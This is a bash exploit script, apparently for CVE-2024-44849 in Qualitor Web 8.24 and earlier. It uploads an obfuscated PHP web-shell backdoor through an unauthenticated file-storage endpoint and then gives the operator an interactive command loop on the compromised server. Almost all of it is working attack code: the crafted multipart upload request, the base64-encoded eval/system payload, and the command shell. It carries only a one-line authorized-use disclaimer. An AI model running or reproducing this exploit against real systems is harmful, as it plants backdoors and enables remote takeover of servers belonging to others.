#!/bin/bash

# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit (CRITICAL)

echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
    
By Extencil <extencil@extencil.me>, September 2024.

Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"

URL=$1

if [ $# -lt 1 ]; then
    echo "
Usage:
    $0 <url>
    $0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
    "
else
    echo "[*] Exploiting the target.."
    # Define the file name and malicious content
    FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
    MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
    BACKDOOR_URL=$(echo $URL | sed 's/checkAcesso.php$//')"$FILENAME"

    # Boundary for multipart/form-data
    BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"

    # Create the POST request with curl using inline file content
    echo "[*] Sending the backdoor.."
curl -X POST $URL -s --insecure \
  -H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
  -H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
  --data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"

2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"

.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"


--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"

$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"


--$BOUNDARY--"

    echo 
    echo
    echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
    echo

    while true; do
    read -p "(backdoor@qualitor): $ " BackdoorCommand

    if [[ "$BackdoorCommand" == "exit" ]]; then
        echo "Exiting..."
        break
    fi

    curl $BACKDOOR_URL -d 0="$BackdoorCommand"
    done


fi